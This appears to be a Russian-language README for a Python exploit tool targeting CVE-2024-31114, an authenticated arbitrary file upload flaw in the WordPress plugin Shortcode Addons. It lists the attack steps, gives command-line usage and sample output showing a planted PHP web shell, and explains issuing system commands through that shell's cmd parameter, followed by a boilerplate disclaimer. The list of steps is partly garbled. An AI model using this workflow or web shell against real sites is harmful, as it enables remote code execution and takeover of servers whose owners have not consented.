
Shortcode Addons <= 3.2.5 — Произвольная загрузка файлов (требуется аутентификация: Admin+)
Shortcode Addons <= 3.2.5 – Аутентифицированная (Admin+) произвольная загрузка файлов
CVE ID: CVE-2024-31114
Оценка CVSS: 9.1 (Критическая)
Плагин Shortcode Addons – with Visual Composer, Divi, Beaver Builder, and Elementor Extension для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов во всех версиях до 3.2.5 включительно.
Эта ошибка позволяет аутентифицированным злоумышленникам с уровнем доступа администратора или выше загружать произвольные файлы на сервер, что может привести к удалённому выполнению кода (RCE).
Этот Python-скрипт автоматизирует эксплуатацию уязвимости. Он выполняет:
_wpnonce)nxploit.php).zipwhoami на целевой сервереusage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD
Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target URL (e.g. http://target.com)
-un, --username USERNAME WordPress Admin Username
-p, --password PASSWORD WordPress Admin Password
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.
После загрузки полезной нагрузки вы можете выполнять системные команды, используя следующий формат:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command
🔹 Пример:
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls
Это выведет список содержимого текущего каталога на сервере.
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования.
Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим скриптом.
Используйте ответственно и только на тех системах, на которые у вас есть явное разрешение на тестирование.
Автор: Nxploited | Khaled Alenazi